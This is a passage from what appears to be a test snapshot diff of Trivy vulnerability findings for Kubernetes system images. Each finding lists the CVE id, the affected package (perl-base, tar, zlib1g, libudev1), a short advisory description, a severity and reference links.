"5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", + ], + }, + "category": "Vulnerability", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "perl: File::Temp insecure temporary file handling", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", + ], + }, + "category": "Vulnerability", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://github.com/curl/curl/issues/9271", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", - ], - }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://support.apple.com/kb/HT213493", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213494", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5573-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": 